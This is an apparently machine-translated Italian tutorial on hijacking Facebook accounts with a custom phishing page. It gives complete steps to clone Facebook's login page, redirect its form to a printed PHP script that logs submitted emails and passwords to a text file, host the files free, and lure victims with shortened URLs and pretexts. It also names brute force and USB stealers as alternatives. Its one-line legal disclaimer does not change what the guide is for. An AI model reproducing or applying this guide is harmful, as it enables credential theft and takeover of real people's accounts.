Come hackerare Facebook creando una pagina di phishing personalizzata
Ciao e benvenuto in un altro tutorial di hacking di Facebook. Questa volta vi mostrerò come creare manualmente una pagina di phishing e hack Facebook con phishing e ingegneria sociale.
Vi mostrerò due metodi uno è quello facile per i principianti che vogliono testare solo l’hack e il secondo è per coloro che vogliono imparare l’hacking e pentesting e creare la loro pagina di phishing Facebook personalizzato.
Un attacco di phishing è il metodo di attacco utilizzato dagli hacker in cui creano una copia del sito originale che è esattamente lo stesso del sito originale. Quindi, utilizzando l’ingegneria sociale e la creatività, inviano il link di phishing alle persone per accedere. Una volta che qualcuno firma le proprie credenziali. Gli hacker possono facilmente ottenere il nome utente e la password della vittima in formato testo.
Quindi, in questo tutorial, ho intenzione di spiegare sia il modo facile e tecnico di hacking Facebook con una pagina di phishing personalizzato.
Metodo semplice per l’hacking di facebook:
- Scarica i file hack: Per dispositivi mobili e per desktop (preferisci desktop poiché non sono rilevati)
- Hosting gratuito: 000webhost
- Puoi effettivamente utilizzare qualsiasi hosting, ma suggerirei questo dato che è quello che userò per questo tutorial.
Passi per creare una pagina di phishing di Facebook falso:
Passo 1: Visita il sito web 000webhost e clicca su Iscriviti GRATUITAMENTE utilizzando qualsiasi e-mail. È molto importante verificare la tua email tramite il messaggio di convalida che ricevi affinché il tuo account sia attivo.
Passo 2: Ora registrati usando il tuo ID e-mail, imposta una password e seleziona un nome di sito web che è buono per il tuo phishing.
Passo 3: Dopo la verifica del tuo Indirizzo di Posta elettronica, fare clic su File Manager e quindi fare clic su Carica file, come mostrato nell’immagine qui sotto:
Passo 4: Ora, si verrà reindirizzati alla effettiva Gestione File del tuo sito web che è come indicato di seguito:
Passo 5: Si darà inizio alla Cartella public_html, che è esattamente dove si vuole essere. Carica entrambi i file scaricati indice.html e post.php a seconda se si desidera incidere versione mobile o desktop di Facebook.
Passo 6: Clicca sull’icona carica nell’angolo destro del File Manager come mostrato nell’immagine qui sotto.
Passo 7: Ora selezionare entrambi i file indice.htm e posta.php e fare clic sul pulsante carica come mostrato nell’immagine qui sotto:
Passo 8: Vai alla lista dei siti Web nel pannello e copia il tuo indirizzo di collegamento al sito Web che hai creato in precedenza. “Il dominio creato dall’hosting”
Pagina di phishing di Facebook mobile:
Pagina di phishing di facebook desktop:
Passo 9: Una volta che il target accede al sito web, vedrai il seguente file chiamato username.txt nel file manager come mostrato di seguito:
Passo 10: Apri il file per visualizzare l’ID e-mail e la password dell’account.
Qui ho usato: sas e sas come email di facebook e password di facebook.
Viola, hai hackerato con successo l’account Facebook usando il phishing.
Ora per coloro che sono disposti a imparare impariamo i dettagli tecnici di hacking facebook manualmente ecco la versione avanzata in cui si fanno i file.
Metodo avanzato: rendere la vostra pagina di phishing Facebook personalizzato manualmente.
Passo 1: Aperto facebook.com
Per creare una pagina di phishing, vai al Facebook.com e poi fare clic destro sull’area vuota. Vedrete molte opzioni è necessario fare clic sull’opzione visualizza pagina di origine. Come puoi vedere sotto nell’immagine.
Passo 2: Creare una copia locale della pagina di Facebook per rendere la pagina di phishing
Quando si fa clic su visualizza fonte pagina si aprirà una nuova scheda come mostrato di seguito che mostra tutto il gruppo di codice. Questo è il codice sorgente della pagina facebook. Si sta per modificarlo in modo che si può utilizzare per fare una pagina di phishing di Facebook. Per farlo:
Seleziona tutto il codice e copia tutto il codice e incollalo nel blocco note e salva il file come indice.mta. L’estensione del file è .htm no .html non fare questo errore.
Fonte pagina Facebook
Copiato il codice sorgente di Facebook per il phishing nel blocco note
Passo 3: Modifica il codice sorgente
Ora apri blocco note in cui hai incollato questo codice e premi CTRL+F e digita AZIONE nella barra di ricerca. Questo è un po ‘ complicato, ma devi trovare la seguente riga nel codice.
action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
Quando trovi il codice simile al codice che ho menzionato sopra, elimina tutto il codice di testo davanti alla parola azione e sostituiscilo con la parola post.php come mostrato di seguito:
Quindi il codice finale sarà simile a questo:
action="post.php"
Fonte pagina Facebook modificato per il phishing
Passo 4: Salvare i file
Ora se non l’hai già salvato, quindi salvarlo in una nuova cartella con l’indice nome.htm Ora hai completato la prima parte della pagina di phishing.
Passo 5: Creazione del file PHP
Per creare la seconda parte della pagina di phishing di Facebook è necessario creare un file PHP. Sto nominando il mio file come post.php poiché questo è quello che ho modificato nel codice sorgente nella prima parte. Se hai intenzione di utilizzare un nome diverso, assicurati di cambiarlo in index.anche htm.
Apri un nuovo file di blocco note e copia il codice indicato di seguito e salvalo con il nome post.PHP. È possibile fare riferimento le immagini qui sotto per riferimento:
<?phpheader ('Location:http://www.facebook.com/');$handle = fopen("usernames.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
Passo 6: Copia i file di phishing di Facebook insieme
Ora, hai creato con successo due file che dovrebbero essere salvati nella stessa cartella.
- indice.htm
- inviare.php
Punto 7: Crea un account account web di hosting gratuito
Visita il sito web 000webhost e clicca su Iscriviti GRATUITAMENTE utilizzando qualsiasi e-mail. È molto importante verificare la tua email tramite il messaggio di convalida che ricevi affinché il tuo account sia attivo.
Passo 8: Apri file manager e carica i file
Ora apri Cpanel (pannello di controllo) sulla dashboard del tuo hosting. Aprire il file manager e quindi fare clic su file manager vai alla cartella public_html. Per impostazione predefinita, dovresti essere in questa cartella
Passaggio 9: Indice di caricamento.htm e posta.php
Fare clic sul pulsante Carica file e caricare entrambi i file precedentemente salvati come mostrato nelle immagini qui sotto.
Passo 10: Assicurati che tutti i file siano caricati.
Assicurati che tutti i file di phishing siano caricati e quindi apri il tuo sito web. Si dovrebbe vedere la pagina originale di Facebook ma quando si vede l’URL si sa che si tratta di una pagina di phishing
Passo 11: Vai all’elenco dei siti Web nel pannello e copia l’indirizzo del link del tuo sito Web creato in precedenza.
Pagina di phishing di facebook desktop:
Passo 12: Una volta che il target accede al sito web, vedrai il seguente file chiamato username.txt nel file manager come mostrato di seguito:
Passo 13: Apri il file per visualizzare l’ID e-mail e la password dell’account.
Qui ho usato: sas e sas come email di facebook e password di facebook.
Viola, hai hackerato con successo l’account Facebook usando il phishing. Questa è la tua pagina di phishing personalizzata per Facebook. Spero che ti sia piaciuto e ha funzionato come previsto.
Trucchi di ingegneria sociale hacker usano per hackerare Facebook:
1)Quando si sta tentando di inviare link di phishing alla vittima di destinazione, è necessario utilizzare un URL shortener come TinyURL che vi aiuterà a mascherare il dominio.
2) Scegliere un buon dominio che sarà attendibile dal target.
3) Sii creativo. È necessario un buon pretesto in modo che l’obiettivo non sospetti.
Domande frequenti su hacking facebook con OSIF
Qui di seguito sono alcune delle domande che possono venire in mente durante il tentativo di utilizzare questo hack. Se la tua domanda non è presente, menzionala gentilmente nella sezione commenti.
Q1. Questo strumento di hacking è legale da usare su chiunque?
No, non dovresti usare questa conoscenza per hackerare le persone. Se lo si utilizza per incidere account Facebook di qualcuno, allora è considerato come un reato penale e si sarà responsabile di eventuali azioni illegali che fate. Ma puoi usarlo per testare e acquisire conoscenze su come gli hacker hackerano Facebook usando il phishing e altri attacchi.
Q2. Ci sono alternative a questo metodo?
Sì, ci sono molti metodi per hackerare account Facebook. Il più famoso è zshadow, shadowave e anomor. È inoltre possibile utilizzare Kali Linux per incidere Facebook facendo una pagina di phishing personalizzato.
Q3. Ci sono altri modi diversi dal phishing?
Bruteforce e strumenti come facebook password extractor funzioneranno. È inoltre possibile utilizzare usb stealer per l’hacking account di Facebook.
Q4. Non funziona cosa faccio?
Assicurati che il file abbia .estensione htm e non .HTML. Confronta i miei file con i tuoi. Prova passo dopo passo. Mobile può o non può funzionare in quanto potrebbe essere facilmente rilevato.